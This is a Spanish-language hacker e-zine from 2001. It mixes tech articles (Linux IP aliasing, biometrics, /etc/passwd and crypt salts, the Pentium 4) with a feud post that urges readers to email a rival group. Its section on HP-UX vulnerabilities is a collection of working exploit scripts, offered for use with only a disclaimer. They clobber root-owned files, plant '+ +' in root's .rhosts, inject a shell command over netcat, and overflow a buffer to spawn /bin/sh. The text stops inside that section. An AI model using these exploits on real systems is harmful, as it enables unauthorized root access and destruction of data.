Acid Klan2:(ak002.txt):10/06/2001 << Back To Acid Klan2


----------------------[http://www.acidklan.org]--------------------------- _______ ______ ___ ______ ___ ___ ___ _______ ______ Y _ Y _ Y Y _ \ Y Y ) ) Y _ Y _ Y | l | l___| | | \ | l /| | | l | | | | _ | |___| | | \ | _ \| |___| _ | | __|__ | | | l l | | l | | | l | | | |Y \ l___| |_______l l_______/ l___| |_______l___| l___|\__l / `---' `---' `---' `---' `-/ /_ -----------------------------------------------------------------/ l |- E-zine 002 by Ac!d Kl4n [electronic magazine] \______| <-----------------------------[Recetas]----------------------------------> [*]Disclaimer [editor] [*]Copia o casualidad? [editor] [1]IBM software para linux? [Rulo] [2]asignando mas ips a un server linux [MIBXXX] [3]Biometrica [Acid Java] [4]El archivo "etc/passwd" [Anthrax] [5]Pentium IV como funciona? [Acid Java] [6]Vulnerabilidades del HP-UX [Z3r0] [7.1]Spo0f mediante s0ck3ts [Ctrl] [7.2]Vulnerabilidad en mIRC Add-on [Ctrl] [8]Avances Tecnologicos ??? [Anthrax] [9]Hacking a los nuevos servidores [Z3r0] [10]Tutorial para un Keygen [Loco mx] [11]Introduccion a AWK [Darkode] [*]Despedida & greets [editor] <----------------------------[ingredientes]------------------------------> Acid klan webmaster@acidklan.org Anthrax anthrax@acidklan.org Java java@acidklan.org Absolut absolut@acidklan.org Darkode darkode@acidklan.org Rulo rulo@acidklan.org MIBXXX mibxxx@acidklan.org Z3r0 z3r0@acidklan.org Loco mx locomx@acidklan.org Ctrl ctrl@acidklan.org <-----------------------------[Disclaimer]--------------------------------> el Acid Klan y ninguno de sus miembros se hace responsable por el uso que le des a estas recetas de cocina. el proposito de este E zine es solo el de aprender a cocinar y que la la informacion sea difundida los articulos aqui contenidos son propiedad de los autores asi que si quieres hacer una referencia de ellos no olvides poner el copyright y la fuente de donde lo conseguiste como en este caso seria http://www.acidklan.org <-----------------------------[Info About]--------------------------------> Recuerda que puedes encontrar esta revista en: www.Acidklan.org www.hackers.com.mx www.Vanhackez.com gracias por el apoyo a todos los que leen y porsupuesto alos que nos han ayudado a distribuirla. Tambien si deseas mandar un articulo eres libre de hacerlo y puedes mandar -lo a webmaster@acidklan.org solo recuerda que nos reservamos el derecho de publicacion del mismo. la publicacion de esta revista se le agradece al grupo de personas que lo hacen posible <-------------------------------------------------------------------------> ************** Copia o casulidad?, tu decides ************** hola primeramente agradecemos el apoyo que nos han brindado en todo mexico y demas paises como espa~a chile argentina brasil etc.. este articulo lo hicimos para pedirles su ayuda el paradigma por que no es problema es el siguiente como ustedes ya saben nosotros como acid klan iniciamos en 1999 y nos distinguimos por ser un equipo original y por ser emprendedores con muchas propuestas nuevas. pero bueno esto no es para eso, sino para mostrarles algo, es para reclamar algo que creemos injusto y solicitamos tu ayuda hace poco una persona llamada acid cherry (fabiola) paranoia y cibernetica crean un grupo llamado aztlan klan o AK les suena??? pues claro 3 fundadores como acid klan acid cherry no les suena a acid java? o aztlanklan.org no les suena a acidklan.org? y sus siglas AK? sabian que realmente es clan y que el usar la K fue idea propia basada en los lejendarios kkk? (que no los apoyamos) ya que clan en ingles es crew tambien vimos la web de estas personas wanabes y encontramos varias cosas muy similares alas nuestras y esto es porque recivimos varios mails que nos avisaban de esto como el el area de disclaimer en la cual fue algo original de nuestra parte el poner las reglas de los miembros junto con el disclaimer y si ven el disclaimer de estas personas veran que son identicos ahh y por ultimo si son de mexico saben que la mayoria de los hackers en mexico lucha o ah luchado en contra de TELMEX el monopolio de la telefonia en mexico. los cuales tienen como lema "la union hace la fuerza" buen lema no?? pues que creen? es tambien el lema de estas personas otra copia que de hecho se podria convertir en un problema legal nosotros no somos un grupo que quiera ser el mejor o destruir alos demas no somos envidiosos de que existan nuevos grupos como nosotros pero si nos molesta que nos copien todo ya que nosotros hacemos lo que hacemos por gusto y creemos que no es justo. ustedes diran que deberiamos de tratarlo con estas personas y tienen razon nuestros miembros dijeron solo una palabra "deface" pero los fundadores dijeron que no era lo apropiado ya que nisiquiera tienen un server propio y ademas no era nuestro estilo pero les mandamos un mail muy amigable exlicando nuestro punto y pidiendo PORFAVOR y AMABLEMENTE que hicieran algo al respecto ellas no aceptaron y nos dijeron "aganle como puedan" y "nos estan amenazando?" ahh y por supuesto nos dijeron "reenviame tus peticiones" como si no supieran leer ala primera las cosas nosostros no amenazamos no nos vamos a poner a pelear como si tuvieramos 5 a~os de edad, pero si podiamos decir los que nos molesta. y eso hicimos nosotros no tenemos intencion de andar de crackers ni nada de eso *************************************************************** *TU PUEDES AYUDARNOS * *manda un mail a: * * acid_cherry@yahoo.com * * azid_ch3rry@AztlanKlan.zzn.com * * webmaster@Aztlanklan.zzn.com * * paranoia@Aztlanklan.zzn.com * * * * * *************************************************************** * y diles que tu apoyas al acid klan * * y que son unas personas poco originales o copionas... * * * * tambien puedes firmar el libro de visitas y decirles lo que * * piensas al respecto * * Acid Klan agradece todo el apoyo que nos han brindado * * * * * * http://www.aztlanklan.org * * http://mx.geocities.com/aztlanklan/aztlanklan.html * * http://www.melodysoft.com/cgi-bin/gbook.cgi?ID=aztlanklan * * http://mx.geocities.com/acid_cherry * * * como ven? la primera 100% hacker y ademas mal escrito *************************************************************** + SI QUIERES VER EL MAIL ESTA ANEXADO ABAJO --------------------------------------------------------------------------------- Mail original enviado a esta gente --------------------------------------------------------------------------------- From: Acid Klan To: azid_ch3rry@aztlanklan.zzn.com Sent: Thursday, May 03, 2001 1:51 AM Subject: peticiones les escribimos para pedirles de la manera mas atenta 4 cosas UNA, que cambien su nombre ya que klan se escribe con c y el usar la k fue idea de uno de nuestros fundadores (acid java) clan en ingles se dice crew por si lo desean asi ya que todos los miembros de acid klan actuales creemos que su nombre es una copia del nuestro ademas de las iniciales AK DOS el dise±o creemos todos que es muy parecido al nuestro digamos que demasiado en la estructura TRES el disclaimer creemos que fue algo original el poner las reglas del klan dentro del disclaimer y al parecer se les ocurrio exactamente lo mismo y con las mismas especificaciones CUATRO en el nombre de todo el nuevo Acid KLan desamos que su miembro Acid cherry se quite el acid ya que.... bueno es logico el porque no? ademas de esto su slogan LA UNION HACE LA FUERZA esta patentado por telmex por si no lo sabian, o nos van a decir que, no saben que es telmex, como dijeron de nosotros... esperamos su respuesta ya que no nos gusta tener problemas con los demas equipos pero no nos gusta que atenten contra nuestras raices de esa forma gracias por la atencion de todas y esperemos no hagan caso omiso alo antes escrito atte: THE ACID KLAN [1]--------------------[IBM software para linux]------------------------[1] Software de IBM para Linux? ======== ========== ======= ======= ======== =========== ======== ======== ==== === === ======= ======= ==== ======== ======== ======== ==== ======== === === === === ==== === === === == == === ======== =========== ===== === ===== ======== ========== ===== = ===== La iniciativa que IBM tiene con respecto a esto es un software de infraestructura de Internet para soportar Linux, con este proyecto IBM pretende dejar atrás a la competencia más fuerte en este ramo que es ORACLE. Para que esto pueda suceder IBM va a proporcionar el soporte más extenso que existe en el mercado desde los dispositivos manuales hasta la unidad principal. IBM esta ofreciendo dos primicias de soporte Linux: 1.-Disponibilidad de DB2 Universal Database para Linux en clusters Intel, siendo el único software de base de datos en la unidad principal. 2.-Software de Web Application Server disponible para Linux. IBM esta ofreciendo adiciones al portafolio de software Linux como el DB2 Universal Database Enterprise-Extended Edition, que es la primer propuesta del mercado que esta ofreciendo clusters Intel en Linux dándonos una solución para las bases de datos de múltiples terabytes que soportan muchos procesadores a través del agrupamiento del servidor. El WebSphere Appplication Server soporta sitios web escalables y de alto rendimiento, uniéndose a Linux para poder correr en los servidores IBM zSeries. El WebSphere es el único software de servidor de aplicación web en Linux para la unidad principal teniendo también la ventaja de correr en los servidores Intel. Ahora en la actualidad la industria de TI tiene altos costos en la implantación del sistema y carencia de habilidades. Con la implementación de DB2 y WebSphere en Linux los desarrolladores se pueden beneficiar en la productividad aprovechando las ventajas de un código de desarrollo que se escribe solo una vez. Estas propuestas fueron soportadas en: -Red Hat -SuSe -Turbolinux [2]---------------[asignando mas ips a un server linux]-----------------[2] Aqui esta paso a paso lo que hay que hacer para anexar "a mano" mas IPs en cualquier servidor linux: a) Ir al directorio /etc/sysconfig/network-scripts b) Pedir un directorio con ls para ver que archivos del tipo ifcfg-eth? existen, puede ser mas de uno por dos razones: Si hay mas de una tarjeta de red entonces podra haber ifcfg-eth0, ifcfg-eth1, ...ifcfg-ethn Si ya hay mas de una IP asignada sobre cualquiera de las tarjetas (tomaremos como ejemplo la eth0) en cuyo caso podrian haber los archivos ifcfg-eth0:0, ifcfg-eth0:1, etc... c) Hay que seleccionar la tarjeta de red a la que se le quiere poner la otra IP (en nuestro ejemplo usaremos eth0). d) Hay que ver hasta donde llegan las clonaciones de esa tarjeta, si solo existe el archivo ifcfg-eth0 entonces trabajaremos con ifcfg-eth0:0, si ya existieran supongamos los archivos ifcfg-eth0:0 e ifcfg-eth0:1 entonces trabajariamos sobre el archivo ifcfg-eth0:2. e) Abrimos el archivo con algun editor de textos, usaremos pico en nuestro ejemplo... Estando DENTRO del directorio /etc/sysconfig/network-scripts pico ifcfg-eth0:0 (de nuevo suponiendo que no hayan clonaciones, si no solo seaumenta el numero que va despues de los dos puntos) f) Se incluyen en ese archivo estas lineas Y SOLO ESTAS (el archivo lo acabamos de crear por lo que debe de estar vacio) IPADDR="127.0.0.1" NETMASK="255.255.255.0" Obviamente la IP JAMAS sera 127.0.0.1 sino mas bien la que le queremos asignar al servidor y la NETMASK es la submascara de red que nos asigna el administrador. Hay casos en que la linea de NETMASK se puede poner asi: NETMASK="" y si funciona, pues linux trata de autodetectar la submascara de red. g) Se cierra (y graba obvieamente el archivo). h) Reiniciamos el servicio network primero, en RedHat y similares se puede hacer con: /etc/rc.d/init.d/network restart Si todo sale bien la nueva IP ya contestara los pings. i) ahora reiniciamos los servicios de inet para que el DNS, sendmail, etc. sepan que pueden recibir peticiones directas a la otra IP... esto lo hacemos con la siguiente linea.... /etc/rc.d/init.d/inet restart j) Si todo se para bien ya debe de estar listo!!! Que hacer en caso de que no funcione? 1. Checar que esa IP si sea la que nos fue asignada. 2. Checar que los numeros de la eth asi como los de la clonacion sean los correctos. 3. Verificar submascara de red 4. Preguntarle a MiBXXX xDDDDD Si necesitan lo mismo pero para otras distribuciones de linux nadamas diganme... creo poderles ayudar con SuSE, Debian, Slackware, FreeBSD y OpenBSD. En este "tutorial" se incluyen todas las distribuciones dependientes de RedHat como Mandrake, esware, Hispafuentes, etc. Saludos: MiBXXX Greetz a: todos los lame-ass crackers... me siguen divirtiendo con sus defaces NTeros xDDDD [3]--------------------------[Biometrica]-------------------------------[3] bueno de seguro ahorita lo unico que se estaran pensando es "y que es la biometrica?" bueno pues deberia empezr por decirles que es una ciencia la cual se dedica a crear maquinas que nos ayudan a autentificar a usuarios por medio de caracteristicas biologicas. como es esto que caracteristicas biologicas podria una maquina detectar en mi como ser humano? y que ademas sean unicas de cada individuo. bueno voy a nombrarlas a continuacion: *************************** Olor corporal Estructura facial Huellas dactilares Patrones de retina o iris Trazado de las venas Voz *************************** bueno estas cosas suenan como de pelicula no? pues digamos que lo son a que me refiero?. bueno me refiero a que esta ciencia es relativamente nueva, porque digo relativamente?. bueno digo nueva porque aun no ha sido bien desarrollada, siendo que la comenzaron los egipcios (faraones) cuando firmaban sus decretos con sellos marcados con sus huellas digitales asi autentificaban sus escritos de una manera infalsificable, pero realmente los primeros pasos se dieron cuando en 1893 Sir Francis Galton nos demostro que no podia haber dos huellas digitales iguales, aunque fuera el caso de los gemelos, este sr es que que poco despues crease el sistema Henry. que utilizamos en la actualidad. el sistema funciona de la siguiente forma, clasifica los montes de las yemas en ocho categorias, la accidental, el lazo central, el lazo doble, el arco plano, la espiral plana, el lazo radial, el arco cubierto y el lazo del hueco codo. comparando estas caracteristicas se establecen de ocho a dieciseis puntos criticos de comparacion resultando una identificacion unica. (muy usado por la policia a nivel mundial) lo malo es que no todo el mundo las tiene ya que por ciertas enfermedades de la piel algunas personas carecen de ellas, es el caso de la "epidermolisis bullosa" hasta mediados del siglo XX aun esta ciencia era muy primitiva Bueno volviendo ala actualidad, esto lo hemos visto en peliculas futuristas tales como "Demolition Man" con Silvester Stallone. muchos la recordaran... bueno en esta historia podremos recordar que hablan de una vision bastante bizarra del futuro donde las personas son reconocidas por las maquinas por su iris (cuando Simon phoenix Sale de la camara criogenica) y tambien por su voz (cuando Jhon Spartan decia grocerias). bueno pues esto es una realidad pero es una tecnologia que le falta mucha mejora porque esta empezando pero aun depende de nosotros su desarrollo ademas esta tecnologia esta muy, muy ligada ala informatica. en la actualidad se puede ocupar para brindar seguridad fisica, como por ejemplo bovedas de banco y demas. ya muchas empresas las ocupan sobre todo las herramientas de reconocimiento dactilar ya que son las mas comunes e utiles las demas aun les falta desarrollo aunque en el caso del iris seria mucho mas confiable que la dactilar usted ya puede emplear estos aparatos en su empresa o casa como es el mouse que solo funciona con la huella dactilar predestinada y demas artefactos que ya existen a continucion les dejo unas ligas que les pueden ser interesantes acerca de esta ciencia y cuelquier duda o comentario ya saben.. java@acidklan.org [4]--------------------[El archivo "etc/passwd"]------------------------[4] El archivo etc/passwd es, por su especial naturaleza, uno de los m s conflictivos que podemos encontrar en un sistema Unix/Linux. Normalmente esta implicado en la mayoria de los ataques de los que pueda ser victima un sistema. Ahora vamos a hablar de su estructura: |root:$1$xXsG8X/h$q7737edJSx2yfHGwanAneVh1:11245:0:0:Anthrax:/root:/bin/ash| ## ## ## # # ## ## ## ## ## ## # # ## ## ## ## ## ## # # ## ## ## #### ## ## # # ## ## ## ## ## ## # # ## ## ## 1.-Nombre de usuario o Login ## ## # # ## ## ## ## ## # # ## ## ## 2.-Contrasea Cifrada 3############# ## # # ## ## ## ## # # ## ## ## 3.-Varibles de unidad seriada################# # # ## ## ## # # ## ## ## 4.-Identificador de usuario o UID################# # ## ## ## # ## ## ## 4.-Identificador de grupo o GID##################### ## ## ## ## ## ## 5.-Gecos o Info del usuario############################## ## ## ## ## 6.-Directorio de entrada o home################################## ## ## 7.-Shell o interprete de comandos####################################### El nombre de usuario o login es una cadena de caracteres que debe ser unica para cada usuario..... El archivo etc/passwd cuenta tambien con usuarios que estan hechos para desempear tareas especiales como: DAEMON | daemon:*:1:1:System Background Account:/sbin: BIN | bin:*:2:2:Sustem Library Account:/bin: ADM | adm:*:3:4:Administrator Subsystem:/var/adm: LP | lp:*:4:7:Line Printer Subsystem:/var/spool/lpd: FTP | ftp:*:5:50:FTP User:/home/ftp: MAIL | mail:*:8:12:Mail Subsystem:/var/spool/mail: NEWS | news:*:9:13:News Subsystem:/var/spool/news: UUCP | uucp:*:10:14:UNIX-to-UNIX Copy:/var/spool/uucp: OPERATOR | operator:*:11:0:Operator:/root: NOBODY | nobody:*:99:99::/tmp Ahora hablemos de seguridad.... Los permisos, los propietarios y los grupos Los permisos son un conjunto de 9 bits que controlan quien puede leer, escribir y ejecutar o acceder a un determinado archivo o directorio, respectivamente. Estos 9 bits se encuentran agurpados de tres en tres siguiendo el patron rwx y cada uno de estos grupos de 3 bits se representa mediante un n£mero octal. ############################ ##OCTAL##BINARIO##PERMISOS## ############################ ## ## ## ## ## 0 ## 000 ## --- ## ## 1 ## 001 ## --x ## ## 2 ## 010 ## -w- ## ## 3 ## 011 ## -wx ## ## 4 ## 100 ## r-- ## ## 5 ## 101 ## r-x ## ## 6 ## 110 ## rw- ## ## 7 ## 111 ## rwx ## ## ## ## ## ############################ *LOS BITS SUID Y SGID* Los bits SUID y SGID, con codigo octal 4000 y 2000, respectivamente, se aplican principalemente a archivos ejecutables. Estos bits permiten que el usuario que ejecute el programa pueda accesar a archvos que de otra forma no podria. Cuando se ejecuta un archivo con el bit SUID artivo, el proceso que ejecuta el programa adopta durante toda la ejecucion de este el UID del propietario. Con el bit SGID ocurre lo mismo, excepto que el sistema lo identifica por el grupo. *EL BIT STICKY* El bit sticky que tiene un codigo octal 1000, puede utilizarse tanto en programas como en directorios. Cuando se utiliza sobre un programa este queda cargado continuamente, de manera que no hay que hacer intercambios de paginas entre memoria principal y secundaria. Si el bit sticky se activa sobre un directorio, ningun usuario puede borrar o renombrar en ese directorio archivos que pertenezcan a otros usuarios. Este bit es util para directorios de escritura publica como /tmp, ya que evita que los usuarios puedan borrar o modificar los archivos de los demas. Para identificar un programa o directorio con el bit sticky activado, tan solo debemos comprobar que la X de los permisos del resto de los usuarios del sistema ha sido sustituida por una t. Bueno pues lo anterior fue para ejemplificar los posibles modos que se le pueden adjudicar a el archivo etc/passwd. Ahora solo nos resta hablar de otras cosillas un poco intrascendentes... Pero muy muyyyyy utiles: *EL ALGORITMO CRYPT()* El algoritmo crypt esta basado en el data encryption standard (DES). Este ultimo utiliza una clave de 56 bits (8 caracteres ASCII). La funci¢n crypth() que implementa UNIX utiliza una variacion del DES que utiliza la contrasea introducida por el usuario como clave con la cual realizara el cifrado de un bloque de 64 bits puestos todos a cero. El resultado obtenido se vulve a cifrar de nuevo con la contrasea del usuario hasta un total de 25 veces. El resultado obtenido un bloque de 64 bits, es entonces empaquetado en una cadena de 11 caracteres, que son los que aparecen en el archivo /etc/passwd. Cada uno de estos caracteres contiene 6 bits del bloque obtenido como resultado del cifrado, y est n formados por alguno de los siguientes caracteres ".", "/", 0-9, a-z, por ese orden en el que el cero es representado mediante el caracter "." y asi sucesivamente. *SALTS* Con la idea de hacer mas resistente el algoritmo DES, se aadio un numero de 12 bits comprendido entre el 0 y el 4095, obtenido del reloj en tiempo real del sistema, que hace que hace que la salida del algoritmo varie en funcion de dicho numero. A este numero se le conoce como SALT. El salt es convertido en una cadena formada por 2 caracteres y es almacenado junto con la contrasea esta es ocupando segun los 2 primeros lugares. Cuando introducimos nuestro password esta es cifrada con el mismo salt, ya que utilizamos otro salt distinto, el resultado obtenido no coincidira con la contrasea almacenada en el archivo etc/passwd. Lo siguiente lo ejemplifico en la sigueinte tabla: ############################################## ## Contrasea ## SALT ## Contrasea Cifrada ## ############################################## ############################################## ## AnThRaXiiO ## oZ ## oZsV5zgRK6sjw ## ############################################## ## J4V4 ## Na ## NaWyhsolA2gTM ## ############################################## ## AnThRaX ## Hc ## HcLrEM.BYtLwk ## ## AnThRaX ## DY ## DYmeXoTgacmWY ## ## AnThRaX ## pd ## pdOTBzon3G2KU ## ############################################## Como podemos ver en las contraseas del usuario AnThRaX un SALT diferente genera contraseas totalemente diferentes. El hecho de aadir un salt implica que cada contrasea puede ser cifrada de 4096 formas distintas, lo que hace que un ataque atravez de los llamados diccionarios inversos {diccionarios que en vez de palabras, contienen el resultado de cifrar diferentes contraseas} sea mucho mas lento ya que se necesitan 4096 entradas para cada contrasea que queremos descifrar. De todas formas el salt no es milagroso xDD. Si realizamos un ataque sobre un unico usuario, no interviene ya que conocemos su salt de antemano..... xDDD:) Pero se dan casualidades como que con un salt diferentese generen contraseas cifradas parecidas...... ############################################## ## CONTRASE¥A ## SALT ## CONTRASE¥A CIFRADA ## ############################################## ############################################## ## 2NGGMda3 ## Hx ## yX8CL2luKyI ## ############################################## ## gnB9Gw1j ## s8 ## yX8CL2luKyI ## ############################################## xDDD Bueno pues eso es todo lo que les pudeo decir acerca de este mugre archivo TORMENTO DE UNOS.... GRACIA DE OTROS.....xDDD:) - EOF - [5]-------------------[Pentium IV como funciona?]-----------------------[5] Bueno ya todos conocemos lo famosos procesadores Pentium de intel aquellos que aparecieron despues de los 486 siendo asi la quinta generacion de procesadores, un gran avanze tecnologico para intel, motivo por el cual intel quisiera patentar su tecnologia, pero les paso algo muy gracioso. no se pueden patentar numeros. no podian ponerle "5" o "586" es por ello que le ponen pentium que significa 5. pero bueno regresando al tema pasado vamos a ver como funciona ya la cuarta generacion de estos procesadores, para algunos los mejores para otros los peores. algunas revistas lo han puesto a prueba a este procesador que comenzo a estar disponible a finales del a~o pasado el P4 es el siguiente paso de intel en su larga trayectoria de procesadores de la familia x86, ahora P4 entra en el mercado con 2 modelos el 1.4GHz y el 1.5GHz mas de 310,000% de la velocidad que teniamos en las PC cuando entraron al mercado hace 20 a~os (4.77MHz) mas adelante intel agrega su 3er modelo de P4 a 1.3 GHz Este procesador ha incorporado grandes mejoras en su dise~o y utiliza las nuevas tecnologias de fabricacion de circuitos integrados asi como un conjunto de instrucciones mas amplio, pero en general no pretende mejorar el desmpe~o de las aplicaciones existentes, ya que la vision de los dise~adores de intel esta en el futuro, ya que las mejoras del P4 son hacia el manejo de la informacion multimedia como es video imagenes sonidos y demas, los cuales en estas epocas les dan un nuevo sentido ala computadora de hoy en dia. Las aplicaciones multimedia cada dia cobran mas relevancia y los usuarios han adoptado con facilidad la tecnologia que les permite hacer sus labores de una manera mas natural sin duda las altas velocidades mejoran el desempe~o de muchas aplicaciones pero las pruebas en esta area por lo general dan resultados alos producidos en el P3 a 1 GHz por lo tanto si esperabas que tu procesador de palabras o tu hoja de calculo funcionara mas rapido..... quedaras decepcionado si navegas por internet acostumbras codificar musica o video, o disfrutas los ahora novedosos juegos, entonces si apreciaras las recompensas de este. La nueva veocidad de bus de datos que ahora puede alcanzar los 400 MHz y que al utilizar todas la lineas de datos pueder tener una tasa de transferencia (ancho de banda) de 3.2 Gb/s P4 se basa en la microarquitectura IA-32 NetBurst que permite mejorar el desmpe~o y trabajar a frecuencias de reloj sustancialmente mayores que las que se podian alcanzar con la tecnologia anterior IA-32 tiene un alto nivel de canales de procesamiento, es superescalar permite ejecutar instrucciones fuera de orden, cuenta con buses de mayor ancho de banda y trabaja con numeros mas grandes de manera directa todo lo cual permite ofrecer un desempe~o lider en la actualidad. las nuevas instrucciones del procesador le permiten trabajar con numeros de mayor precision y en un tiempo menor este tiene lineas de cache de 128 bytes me gustaria mencionar algunas caracteristicas que tiene el P4 tecnologia de hyper-pipelined avanzada ejecucion dinamica motor de alta ejecucion operaciones de punto flotante mejoradas cache de rastereo de ejecucion 144 nuevas instrucciones Bus de sistema de gran ancho de banda HARDWARE al igual que en los coches no basta un buen motor si no tenemos unas buenas llantas, asi las computadoras que ahora pretendan usar procesadores velozes como en este caso el P4 deberan de acompa~arse con circuitos que permitan demostrar lo que pueden realizar ese conjunto de circuitos se conoce como conjunto de chips e intel ah dise~ado para el P4 el intel 850, este conjunto de chips le permite trabajar con la misma frecuencia de bus que el procesador, lo cual permite transferir hasta 3.2Gb/s de memoria que tambien debe de ser especial la memoria requerida se conecta atravez de los canales duales RDRAM (rambus) lo cual elimina los cuellos de botella que podrian presentarse. Bus de sistema <------------------> -------------------- | | | Unidad de bus | | | -------------------- -------------------- -------------------- | | | | | Cache nivel 2 | <--> | Cache nivel 1 | | 3 vias | | 4 vias | -------------------- -------------------- --------- --------- --------- --------- | | | Rastreo | | | | | | Carga | | de | ---> |Ejecucion| | Retiro | | | |ejecucion| | | | | --------- --------- --------- --------- -------------------- | | | | |BTB/ Prediccion de | <---------------------- | ramificacion | -------------------- RESULTADOS P4 era un modelo a 1.5 con el cual se pudo apreciar las ventajas en desempe~o que se obtienen en las pruebas de Ziff-Davis el equipo que probaron era un P4 1.5GHz 256 MB de ram y disco de 28GB en el programa de 3D winbench 2000 genero 134 cuadros por segundo la realida es que es una nueva tecnologia que talvez ahorita no la veamos muy buena ya que puede que en algunas aplicaciones se desmpe~e igual que el P3 pero es una tecnologia que intel penso a futuro y dirigida alas aplicaciones de multimedia en resumen creo que el mercado de los procesadores hoy en dia dependen de un gusto muy personal y ya no de la tecnologia aunque sea distinta entre ellos aunque a mi en lo personal me gustaria que la nueva tecnologia fuera probada un poco mas antes de que saliese al mercado ademas de que los precios de intel son mas elevados que los de la competencia siendo que la calidad es muy similar entre sus oponentes aunque esta tecnologia que ocupa ahora P4 es muy revolucionaria aunque puede ser que no practica mi deber es solamente mostrar como funciona la ultima decision es suya Datos $ 819 US Dls a 1.5Ghz $ 644 US Dls a 1.4Ghz Precio de mayoreo de 100 unidades agradesco a todos los que ayudaron en este articuloa Fuente: PC mag, Intel online. [6]------------------[Vulnerabilidades del HP-UX]-----------------------[6] Aqui les presento una recopilacion de Exploits's para el Famoso HP-UX y asi conoscan unas de las frecuentes vulnerabilidades de este sistema que es muy usado en muchas IMPORTANTES EMPRESAS jajajaja diria cuales pero no porque es Top Secret asi que investiguenle tal vez tu red escolar o laboral esta basada en algun servidor de HP .... EMPECEMOS!!!!... ------------------------------------------------------------------ ]||[ Vulberabilidad xwcreate / xwdestroy ]||[ [Inicio] #!/bin/ksh # say Bye-Bye to any root owned file thanks to xwcreate/destroy if [ -z "$1" ] then echo "try: `basename $0` filename [display]" exit fi if [ -n "$2" ] then DISPLAY=$2 export DISPLAY fi WMDIR=`dirname $1` FILE=`basename $1` export WMDIR echo echo "Before: ls -l $1 produces:" ls -l $1 xwcreate $FILE xwdestroy $FILE echo echo "After: ls -l $1 produces:" ls -l $1 [Fin] ------------------------------------------------------------------ ------------------------------------------------------------------ ]||[ Vulberabilidad Subnetconfig ]||[ [Inicio] #!/bin/ksh echo '#!/bin/ksh' > /tmp/cat echo 'chmod 666 ~root/.rhosts' >> /tmp/cat echo 'echo + + >> ~root/.rhosts' >> /tmp/cat chmod 777 /tmp/cat PATH=/tmp:$PATH export PATH /etc/subnetconfig rm /tmp/cat [Fin] ------------------------------------------------------------------ ------------------------------------------------------------------ ]||[ Vulberabilidad Glance ]||[ [Inicio] #!/bin/ksh # the one .traz FILE=$1 PROGGIE=`basename $0` GLANCE=/usr/perf/bin/glance if [ -z "$1" ] then echo "usage: $PROGGIE file_to_create_or_overwrite" exit fi if [ -f ~/.glancerc ] then mv ~/.glancerc ~/.glancerc.old fi umask 0 ln -s $FILE ~/.glancerc if [ -f $FILE ] then echo "File exists -- will be overwritten with garbage" else echo "File doesn't exist -- will be created mode 666" CREATE_666="yes" fi echo "Please wait about 10 seconds or so" ${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1 if [ -n "${CREATE_666}" ] then >$FILE fi rm ~/.glancerc if [ -f ~/.glancerc.old ] then mv ~/.glancerc.old ~/.glancerc fi [Fin] ------------------------------------------------------------------ ------------------------------------------------------------------ ]||[ Vulberabilidad Remota del Watch ]||[ [Inicio] #!/bin/ksh echo ' 11T ;/bin/ksh' | nc $1 5556 # Yup, that's it. That's the hole.. Believe it. [Fin] ------------------------------------------------------------------ ------------------------------------------------------------------ ]||[ Vulberabilidad Exploit Vieja del Watch ]||[ [Inicio] #!/bin/ksh # OK.. this bug gets inserted into remwatch after the patch.. It was there # before in some versions, but now it's pretty much universal if the patch # gets installed... # Silly Scriptor & friend, SOD, (11Jun96) if [ ! -x /usr/remwatch/bin/disks/showdisk ] then echo This is an exploit for the showdisk utility internal to echo HP\'s Remote Watch series of programs. echo The showdisk utility doesn\'t appear to be on your system. echo Moo exit fi FILE=$1 if [ -z "$FILE" ] then FILE=/.rhosts fi if [ -f "$FILE" ] then echo "Hey, there already a ${FILE}!" echo "I'd rather enjoy making new files, thank you very much..." exit fi umask 0000 /usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1 >${FILE} ls -l ${FILE} if [ "${FILE}" = "/.rhosts" ] then echo "Adding + + ..." echo "+ +" >> /.rhosts remsh localhost -l root ksh -i fi [Fin] ------------------------------------------------------------------ ------------------------------------------------------------------ ]||[ Vulberabilidad mstm / cstm {Codigo en C} ]||[ [Inicio] mstm / cstm vulnerability main() { char buf[500]; strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\ x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\ x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\ x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\ x03\x30\x1b"); execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0); execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0); } [Fin] ------------------------------------------------------------------ ******************************************************************************** ******************************************************************************** ******************************************************************************** ***Todas Las Anteriores Exploits fueron Provadas en 3 servidores HP distintos*** ***comprobando la funcionalidad de los exploits los modelos de los Servidores*** ***HP en donde se provaron fueron HP9000 T5000,HP9000 E210,HP9000 N4000,la *** ***vulnerabilidad que solo funciono en el T500 fue Vulberabilidad Exploit *** ***Vieja del Watch de alli en fuera los demas fueron comprobados en todos los*** ***demas Servers tambien los probo ^*StAx*^ un Wy que dise trabajar en Pemex *** ***y que las provo en superdomes eso a mi no me consta pero en fin no esta *** ***de mas hacer el comentario no me hago responsable del uso de este material*** ***El fin de este material es educar y mejorar la seguridad en todo tipo de *** ***Servidores no solo en los de HP,Tampoco el AcidKlan se hace responsable *** ***del mal uso de estos,Asi que es tu pedo si abusas de esta informacion *** *** *** *** Sin Mas por el Momento *** *** *** *** Acid z3r0 